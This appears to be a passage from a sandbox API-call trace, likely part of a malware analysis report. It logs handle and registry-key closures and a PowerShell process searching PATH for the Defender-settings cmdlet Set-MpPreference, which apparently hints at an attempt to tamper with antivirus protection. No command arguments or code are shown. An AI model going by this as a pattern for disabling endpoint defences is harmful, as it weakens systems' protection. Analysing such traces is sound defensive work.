0x8c4 [0109.766] CoGetContextToken (in: pToken=0x2abfab8 | out: pToken=0x2abfab8) returned 0x0 [0109.766] CObjectContext::QueryInterface () returned 0x0 [0109.766] CObjectContext::GetCurrentThreadType () returned 0x0 [0109.766] Release () returned 0x0 [0109.766] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0139.920] LocalFree (hMem=0x369858) returned 0x0 [0139.920] GetLastError () returned 0x0 [0139.921] CloseHandle (hObject=0x344) returned 1 [0139.921] GetLastError () returned 0x0 [0139.921] CloseHandle (hObject=0x13) returned 1 [0139.921] GetLastError () returned 0x0 [0139.921] CloseHandle (hObject=0xf) returned 1 [0139.922] GetLastError () returned 0x0 [0139.922] RegCloseKey (hKey=0x328) returned 0x0 [0139.922] RegCloseKey (hKey=0x324) returned 0x0 [0139.922] RegCloseKey (hKey=0x320) returned 0x0 [0139.922] LocalFree (hMem=0x369878) returned 0x0 [0139.922] GetLastError () returned 0x0 [0139.922] RegCloseKey (hKey=0x348) returned 0x0 [0145.139] RegCloseKey (hKey=0x1e4) returned 0x0 [0146.772] RegCloseKey (hKey=0x388) returned 0x0 [0146.772] RegCloseKey (hKey=0x384) returned 0x0 [0146.772] RegCloseKey (hKey=0x1e8) returned 0x0 [0146.772] RegCloseKey (hKey=0x3b0) returned 0x0 [0146.773] RegCloseKey (hKey=0x37c) returned 0x0 [0146.773] RegCloseKey (hKey=0x378) returned 0x0 [0146.773] RegCloseKey (hKey=0x374) returned 0x0 [0146.773] RegCloseKey (hKey=0x370) returned 0x0 [0146.773] RegCloseKey (hKey=0x36c) returned 0x0 [0146.773] RegCloseKey (hKey=0x368) returned 0x0 [0146.774] RegCloseKey (hKey=0x364) returned 0x0 [0146.774] RegCloseKey (hKey=0x3ac) returned 0x0 [0146.774] RegCloseKey (hKey=0x3a8) returned 0x0 [0146.774] RegCloseKey (hKey=0x35c) returned 0x0 [0146.774] RegCloseKey (hKey=0x358) returned 0x0 [0146.775] RegCloseKey (hKey=0x354) returned 0x0 [0146.775] RegCloseKey (hKey=0x350) returned 0x0 [0146.775] RegCloseKey (hKey=0x344) returned 0x0 [0146.775] RegCloseKey (hKey=0x328) returned 0x0 [0146.775] RegCloseKey (hKey=0x324) returned 0x0 [0146.776] RegCloseKey (hKey=0x1ec) returned 0x0 [0146.776] RegCloseKey (hKey=0x1e4) returned 0x0 [0146.776] RegCloseKey (hKey=0x3a4) returned 0x0 [0146.776] RegCloseKey (hKey=0x3a0) returned 0x0 [0146.776] RegCloseKey (hKey=0x380) returned 0x0 [0146.776] RegCloseKey (hKey=0x3b4) returned 0x0 [0146.777] RegCloseKey (hKey=0x398) returned 0x0 [0146.777] RegCloseKey (hKey=0x394) returned 0x0 [0146.777] RegCloseKey (hKey=0x390) returned 0x0 [0146.777] RegCloseKey (hKey=0x38c) returned 0x0 [0150.091] RegCloseKey (hKey=0x3ac) returned 0x0 [0153.498] GetLastError () returned 0x0 [0153.498] GetLastError () returned 0x0 [0153.498] LocalFree (hMem=0x35e688) returned 0x0 [0153.498] GetLastError () returned 0x0 [0153.499] GetLastError () returned 0x0 [0153.499] GetLastError () returned 0x0 [0153.499] LocalFree (hMem=0x35e600) returned 0x0 [0153.499] GetLastError () returned 0x0 [0153.504] DeregisterEventSource (hEventLog=0x4e90004) returned 1 [0153.548] GetLastError () returned 0x0 [0153.562] CloseHandle (hObject=0x3d8) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] CloseHandle (hObject=0x3d4) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] CloseHandle (hObject=0x3d0) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] CloseHandle (hObject=0x3cc) returned 1 [0153.562] GetLastError () returned 0x0 [0153.563] CloseHandle (hObject=0x3c8) returned 1 [0153.563] GetLastError () returned 0x0 [0153.563] CloseHandle (hObject=0x3c4) returned 1 [0153.563] GetLastError () returned 0x0 [0153.563] CloseHandle (hObject=0x3c0) returned 1 [0153.563] GetLastError () returned 0x0 [0153.563] CloseHandle (hObject=0x3bc) returned 1 [0153.563] GetLastError () returned 0x0 [0153.563] CloseHandle (hObject=0x39c) returned 1 [0153.563] GetLastError () returned 0x0 [0153.564] CloseHandle (hObject=0x388) returned 1 [0153.564] GetLastError () returned 0x0 [0153.564] CloseHandle (hObject=0x384) returned 1 [0153.564] GetLastError () returned 0x0 [0153.564] CloseHandle (hObject=0xf) returned 1 [0153.570] GetLastError () returned 0x0 [0153.570] CloseHandle (hObject=0x7f) returned 1 [0153.570] GetLastError () returned 0x0 [0153.571] CloseHandle (hObject=0x7b) returned 1 [0153.571] GetLastError () returned 0x0 [0153.571] CloseHandle (hObject=0x77) returned 1 [0153.571] GetLastError () returned 0x0 [0153.571] CloseHandle (hObject=0x73) returned 1 [0153.572] GetLastError () returned 0x0 [0153.572] CloseHandle (hObject=0x6f) returned 1 [0153.572] GetLastError () returned 0x0 [0153.572] CloseHandle (hObject=0x6b) returned 1 [0153.573] GetLastError () returned 0x0 [0153.573] CloseHandle (hObject=0x67) returned 1 [0153.573] GetLastError () returned 0x0 [0153.573] CloseHandle (hObject=0x63) returned 1 [0153.573] GetLastError () returned 0x0 [0153.574] CloseHandle (hObject=0x5f) returned 1 [0153.574] GetLastError () returned 0x0 [0153.574] CloseHandle (hObject=0x5b) returned 1 [0153.574] GetLastError () returned 0x0 [0153.574] CloseHandle (hObject=0x57) returned 1 [0153.575] GetLastError () returned 0x0 [0153.575] CloseHandle (hObject=0x53) returned 1 [0153.575] GetLastError () returned 0x0 [0153.575] CloseHandle (hObject=0x4f) returned 1 [0153.576] GetLastError () returned 0x0 [0153.576] CloseHandle (hObject=0x4b) returned 1 [0153.576] GetLastError () returned 0x0 [0153.576] CloseHandle (hObject=0x47) returned 1 [0153.576] GetLastError () returned 0x0 [0153.577] CloseHandle (hObject=0x3a8) returned 1 [0153.577] GetLastError () returned 0x0 [0153.577] CloseHandle (hObject=0x35c) returned 1 [0153.577] GetLastError () returned 0x0 [0153.577] CloseHandle (hObject=0x358) returned 1 [0153.577] GetLastError () returned 0x0 [0153.577] CloseHandle (hObject=0x354) returned 1 [0153.577] GetLastError () returned 0x0 [0153.578] CloseHandle (hObject=0x350) returned 1 [0153.578] GetLastError () returned 0x0 [0153.578] CloseHandle (hObject=0x344) returned 1 [0153.578] GetLastError () returned 0x0 [0153.578] CloseHandle (hObject=0x328) returned 1 [0153.578] GetLastError () returned 0x0 [0153.578] CloseHandle (hObject=0x324) returned 1 [0153.578] GetLastError () returned 0x0 [0153.578] CloseHandle (hObject=0x1ec) returned 1 [0153.579] GetLastError () returned 0x0 [0153.579] CloseHandle (hObject=0x1e4) returned 1 [0153.579] GetLastError () returned 0x0 [0153.579] CloseHandle (hObject=0x3a4) returned 1 [0153.579] GetLastError () returned 0x0 [0153.579] CloseHandle (hObject=0x380) returned 1 [0153.579] GetLastError () returned 0x0 [0153.579] CloseHandle (hObject=0x3a0) returned 1 [0153.579] GetLastError () returned 0x0 [0153.580] CloseHandle (hObject=0x43) returned 1 [0153.580] GetLastError () returned 0x0 [0153.580] CloseHandle (hObject=0x3f) returned 1 [0153.580] GetLastError () returned 0x0 [0153.580] CloseHandle (hObject=0x3b) returned 1 [0153.581] GetLastError () returned 0x0 [0153.581] CloseHandle (hObject=0x37) returned 1 [0153.581] GetLastError () returned 0x0 [0153.581] CloseHandle (hObject=0x33) returned 1 [0153.581] GetLastError () returned 0x0 [0153.582] CloseHandle (hObject=0x2f) returned 1 [0153.582] GetLastError () returned 0x0 [0153.582] CloseHandle (hObject=0x2b) returned 1 [0153.582] GetLastError () returned 0x0 [0153.582] CloseHandle (hObject=0x27) returned 1 [0153.583] GetLastError () returned 0x0 [0153.583] CloseHandle (hObject=0x23) returned 1 [0153.583] GetLastError () returned 0x0 [0153.583] CloseHandle (hObject=0x1f) returned 1 [0153.583] GetLastError () returned 0x0 [0153.583] CloseHandle (hObject=0x1b) returned 1 [0153.584] GetLastError () returned 0x0 [0153.584] CloseHandle (hObject=0x17) returned 1 [0153.584] GetLastError () returned 0x0 [0153.584] CloseHandle (hObject=0x13) returned 1 [0153.584] GetLastError () returned 0x0 [0153.584] CloseHandle (hObject=0x34c) returned 1 [0153.584] GetLastError () returned 0x0 [0153.585] RegCloseKey (hKey=0x3e4) returned 0x0 [0153.585] RegCloseKey (hKey=0x80000004) returned 0x0 [0153.585] CloseHandle (hObject=0x3e0) returned 1 [0153.585] GetLastError () returned 0x0 [0153.585] CloseHandle (hObject=0x308) returned 1 [0153.585] GetLastError () returned 0x0 [0153.585] CloseHandle (hObject=0x33c) returned 1 [0153.585] GetLastError () returned 0x0 [0153.585] UnmapViewOfFile (lpBaseAddress=0x1f10000) returned 1 [0153.586] CloseHandle (hObject=0x3dc) returned 1 [0153.586] GetLastError () returned 0x0 Thread: id = 202 os_tid = 0xacc Thread: id = 211 os_tid = 0xad0 [0149.300] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0149.353] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.363] VirtualQuery (in: lpAddress=0x5f5e640, lpBuffer=0x5f5f640, dwLength=0x1c | out: lpBuffer=0x5f5f640*(BaseAddress=0x5f5e000, AllocationBase=0x55d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.570] GetLastError () returned 0xcb [0149.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.574] GetLastError () returned 0xcb [0149.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.575] GetLastError () returned 0xcb [0149.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.594] GetLastError () returned 0xcb [0149.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.599] GetLastError () returned 0xcb [0149.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.599] GetLastError () returned 0xcb [0149.675] VirtualQuery (in: lpAddress=0x5f5e75c, lpBuffer=0x5f5f75c, dwLength=0x1c | out: lpBuffer=0x5f5f75c*(BaseAddress=0x5f5e000, AllocationBase=0x55d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.675] GetLastError () returned 0xcb [0149.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.677] GetLastError () returned 0xcb [0149.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.678] GetLastError () returned 0xcb [0149.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.725] GetLastError () returned 0xcb [0149.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.760] GetLastError () returned 0xcb [0149.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.852] GetLastError () returned 0xcb [0149.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.853] GetLastError () returned 0xcb [0149.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.854] GetLastError () returned 0xcb [0149.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.855] GetLastError () returned 0xcb [0149.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.856] GetLastError () returned 0xcb [0149.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.857] GetLastError () returned 0xcb [0149.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.858] GetLastError () returned 0xcb [0149.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.876] GetLastError () returned 0xcb [0149.962] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.962] GetLastError () returned 0xcb [0149.965] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0xc0 [0149.965] GetLastError () returned 0xcb [0149.965] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3b4368, nSize=0xc0 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf [0149.965] GetLastError () returned 0xcb [0149.989] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3b7120 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.989] GetLastError () returned 0xcb [0150.016] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.016] GetLastError () returned 0xcb [0150.017] SetErrorMode (uMode=0x1) returned 0x1 [0150.043] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.043] GetLastError () returned 0x3 [0150.098] SetErrorMode (uMode=0x1) returned 0x1 [0150.100] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.100] GetLastError () returned 0x3 [0150.100] SetErrorMode (uMode=0x1) returned 0x1 [0150.100] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.101] GetLastError () returned 0x3 [0150.102] SetErrorMode (uMode=0x1) returned 0x1 [0150.103] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.103] GetLastError () returned 0x3 [0150.103] SetErrorMode (uMode=0x1) returned 0x1 [0150.103] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.103] GetLastError () returned 0x3 [0150.105] SetErrorMode (uMode=0x1) returned 0x1 [0150.105] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.105] GetLastError () returned 0x3 [0150.105] SetErrorMode (uMode=0x1) returned 0x1 [0150.105] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.106] GetLastError () returned 0x3 [0150.107] SetErrorMode (uMode=0x1) returned 0x1 [0150.108] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.108] GetLastError () returned 0x3 [0150.108] SetErrorMode (uMode=0x1) returned 0x1 [0150.108] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.108] GetLastError () returned 0x3 [0150.110] SetErrorMode (uMode=0x1) returned 0x1 [0150.110] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.110] GetLastError () returned 0x3 [0150.110] SetErrorMode (uMode=0x1) returned 0x1 [0150.110] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.110] GetLastError () returned 0x3 [0150.112] SetErrorMode (uMode=0x1) returned 0x1 [0150.113] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.113] GetLastError () returned 0x3 [0150.113] SetErrorMode (uMode=0x1) returned 0x1 [0150.113] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.113] GetLastError () returned 0x3 [0150.115] SetErrorMode (uMode=0x1) returned 0x1 [0150.115] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.115] GetLastError () returned 0x3 [0150.115] SetErrorMode (uMode=0x1) returned 0x1 [0150.115] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.115] GetLastError () returned 0x3 [0150.117] SetErrorMode (uMode=0x1) returned 0x1 [0150.118] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.118] GetLastError () returned 0x3 [0150.118] SetErrorMode (uMode=0x1) returned 0x1 [0150.118] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.118] GetLastError () returned 0x3 [0150.120] SetErrorMode (uMode=0x1) returned 0x1 [0150.120] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.120] GetLastError () returned 0x3 [0150.120] SetErrorMode (uMode=0x1) returned 0x1 [0150.120] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.120] GetLastError () returned 0x3 [0150.122] SetErrorMode (uMode=0x1) returned 0x1 [0150.122] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.122] GetLastError () returned 0x3 [0150.122] SetErrorMode (uMode=0x1) returned 0x1 [0150.123] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.123] GetLastError () returned 0x3 [0150.125] SetErrorMode (uMode=0x1) returned 0x1 [0150.125] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.125] GetLastError () returned 0x3 [0150.125] SetErrorMode (uMode=0x1) returned 0x1 [0150.125] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.125] GetLastError () returned 0x3 [0150.127] SetErrorMode (uMode=0x1) returned 0x1 [0150.127] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.127] GetLastError () returned 0x3 [0150.127] SetErrorMode (uMode=0x1) returned 0x1 [0150.127] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.128] GetLastError () returned 0x3 [0150.177] SetErrorMode (uMode=0x1) returned 0x1 [0150.177] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.177] GetLastError () returned 0x3 [0150.177] SetErrorMode (uMode=0x1) returned 0x1 [0150.177] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.177] GetLastError () returned 0x3 [0150.179] SetErrorMode (uMode=0x1) returned 0x1 [0150.179] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41 [0150.179] GetLastError () returned 0x3 [0150.179] SetErrorMode (uMode=0x1) returned 0x1 [0150.179] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.180] GetLastError () returned 0x3 [0150.181] SetErrorMode (uMode=0x1) returned 0x1 [0150.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.183] GetLastError () returned 0x3 [0150.183] SetErrorMode (uMode=0x1) returned 0x1 [0150.184] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.ps1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.184] GetLastError () returned 0x2 [0150.184] SetErrorMode (uMode=0x1) returned 0x1 [0150.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.184] GetLastError () returned 0x2 [0150.184] SetErrorMode (uMode=0x1) returned 0x1 [0150.184] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psm1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.184] GetLastError () returned 0x2 [0150.184] SetErrorMode (uMode=0x1) returned 0x1 [0150.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.185] GetLastError () returned 0x2 [0150.185] SetErrorMode (uMode=0x1) returned 0x1 [0150.185] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psd1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.185] GetLastError () returned 0x2 [0150.185] SetErrorMode (uMode=0x1) returned 0x1 [0150.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.185] GetLastError () returned 0x2 [0150.185] SetErrorMode (uMode=0x1) returned 0x1 [0150.185] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.COM", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.185] GetLastError () returned 0x2 [0150.185] SetErrorMode (uMode=0x1) returned 0x1 [0150.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.186] GetLastError () returned 0x2 [0150.186] SetErrorMode (uMode=0x1) returned 0x1 [0150.186] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.EXE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.186] GetLastError () returned 0x2 [0150.186] SetErrorMode (uMode=0x1) returned 0x1 [0150.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.186] GetLastError () returned 0x2 [0150.186] SetErrorMode (uMode=0x1) returned 0x1 [0150.186] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.BAT", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.186] GetLastError () returned 0x2 [0150.186] SetErrorMode (uMode=0x1) returned 0x1 [0150.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.186] GetLastError () returned 0x2 [0150.187] SetErrorMode (uMode=0x1) returned 0x1 [0150.187] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.CMD", lpFindFileData=0x3b7120 | out: 